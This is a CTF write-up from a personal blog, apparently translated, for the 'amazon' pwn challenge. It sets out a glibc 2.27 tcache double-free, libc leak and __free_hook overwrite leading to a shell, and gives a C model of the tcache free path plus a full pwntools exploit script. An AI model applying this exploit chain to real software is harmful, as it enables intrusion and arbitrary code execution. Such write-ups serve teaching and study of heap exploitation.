数字经济 (Digital Economy) CTF: pwn amazon writeup

Approach

1. With the tcache mechanism of glibc 2.27, free the same chunk eight times in a row so that it ends up in the unsorted bin; printing it then leaks the libc base address.
2. Use unsorted-bin consolidation to get overlapping chunks and overwrite the fd field of a tcache entry with the address of __free_hook.
3. Write "$0\x00" (equivalent to /bin/sh) into a heap chunk in advance.
4. Allocate a chunk near __free_hook and overwrite __free_hook with system.
5. Free the chunk to get a shell.
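Why step 1 works on glibc 2.27 and stops working from glibc 2.29 on, as an added, simplified C model of the tcache free path (my own illustration, not the author's code and not glibc's source; the count limit, the key value and the chunk/bin structs are assumptions of the model):

```c
#include <stdint.h>
#include <stddef.h>
#define TCACHE_MAX_COUNT 7        /* glibc default: at most 7 chunks per tcache bin */
#define MODEL_KEY 0x5a5a5a5aU     /* constructed stand-in for the 2.29+ tcache key */
enum free_result { TO_TCACHE, TO_UNSORTED, DOUBLE_FREE_DETECTED };
/* user-data view of a freed chunk: next pointer, then the key slot */
struct chunk { uintptr_t next; uintptr_t key; };
struct tcache_bin { int count; struct chunk *head; };

/* check_key = 0 models glibc 2.27 (no double-free check in tcache);
 * check_key = 1 models glibc 2.29+, which stamps a key into freed
 * chunks and refuses to free a chunk that still carries it. */
static enum free_result model_free(struct tcache_bin *bin, struct chunk *c, int check_key)
{
    if (check_key && c->key == MODEL_KEY)
        return DOUBLE_FREE_DETECTED;      /* "free(): double free detected in tcache 2" */
    if (bin->count < TCACHE_MAX_COUNT) {
        c->next = (uintptr_t)bin->head;   /* push onto the singly linked bin */
        c->key = MODEL_KEY;
        bin->head = c;
        bin->count++;
        return TO_TCACHE;
    }
    /* bin full: the 8th free of the writeup's 0x90-byte chunk (too big for a
     * fastbin) falls through to the unsorted bin, whose fd/bk point into
     * main_arena; that pointer is what show() leaks in step 1 */
    return TO_UNSORTED;
}

/* Free the same chunk n times without ever reallocating it (the checkout
 * bug in the writeup) and report where the last free went. */
enum free_result free_same_chunk(int n, int check_key)
{
    struct tcache_bin bin = { 0, NULL };
    struct chunk c = { 0, 0 };
    enum free_result r = TO_TCACHE;
    for (int i = 0; i < n; i++) {
        r = model_free(&bin, &c, check_key);
        if (r == DOUBLE_FREE_DETECTED)
            break;
    }
    return r;
}
```

The real 2.29+ check additionally walks the bin to confirm the chunk is really present before aborting, which the model omits.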

exp

Local environment: Ubuntu 18.04

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"

exe = './amazon'
elf = ELF(exe)

# one_gadget offsets for the target libc (not used in the final chain)
one = [0x4f2c5, 0x4f322, 0x10a38c]

#------------------------------------
def d(s = ''):
    gdb.attach(p, s)

def manu(idx):
    p.sendlineafter('choice: ', str(idx))

def add(num, size, note):
    manu(1)
    p.sendlineafter('buy: ', str(1))
    p.sendlineafter('many: ', str(num))
    p.sendlineafter('note: ', str(size))
    p.send(note)

def add1(num, size, note):
    manu(1)
    p.sendlineafter('buy: ', str(1))
    p.sendline(str(num))
    p.sendline(str(size))
    p.sendline(note)

def show():
    manu(2)

def checkout(idx):
    manu(3)
    p.sendlineafter('for: ', str(idx))

def pwn():
    add(2, 0x80, 'a')   # 0
    add(2, 0xa0, 'A')   # 1
    add(2, 0x90, 'A')   # 2
    add(2, 0x10, 'A')   # 3
    # checkout never clears the pointer: 7 frees fill the tcache bin and the
    # 8th sends chunk 0 to the unsorted bin, where fd/bk point into main_arena
    for i in range(8):
        checkout(0)

    for i in range(8):
        checkout(2)

    # show() still prints chunk 0, so the main_arena pointer leaks
    show()
    p.recvuntil('Name: ')
    libc.address = u64(p.recv(6).ljust(8, '\x00')) - 0x3ebca0
    success('libc.address--->' + hex(libc.address))
    for i in range(8):
        checkout(1)
    # overlapping chunk: forge the neighbouring header (0xa1) and point the
    # tcache entry's fd at __free_hook-0x40
    add(2, 0x100, '\xff'*0x80 + p64(3) + p64(0xa1) + p64(libc.sym['__free_hook'] - 0x40))  # 0 1
    checkout(0)
    add(2, 0xa0, 'a'*0x8)  # 4
    # "$0\x00" as the note: system("$0") spawns sh
    add(2, 0x100, '\x99'*0x80 + p64(3) + p64(0xa1) + '$0\x00')  # 5
    # served from the poisoned tcache entry near __free_hook; sets __free_hook = system
    add(2, 0xa0, '\x00'*0x20 + p64(libc.sym['system']))
    #d()
    # freeing chunk 5 calls __free_hook("$0"), i.e. system("$0")
    checkout(5)

    p.interactive()
#-------------------------------------
if __name__ == '__main__':
    l = 1
    if l:
        p = process(exe)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        p = remote('121.41.38.38', 9999)
        libc = ELF('libc-2.27.so')

    pwn()

References:
https://firmianay.gitbooks.io/ctf-all-in-one/doc/4.14_glibc_tcache.html
https://mp.weixin.qq.com/s/Q4A6LwCd2E29uSXjMJs1dg

Author: nocbtm
Link: https://nocbtm.github.io/2019/09/25/数字经济 pwn amazon writeup/
License: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit nocbtm's Blog when reposting.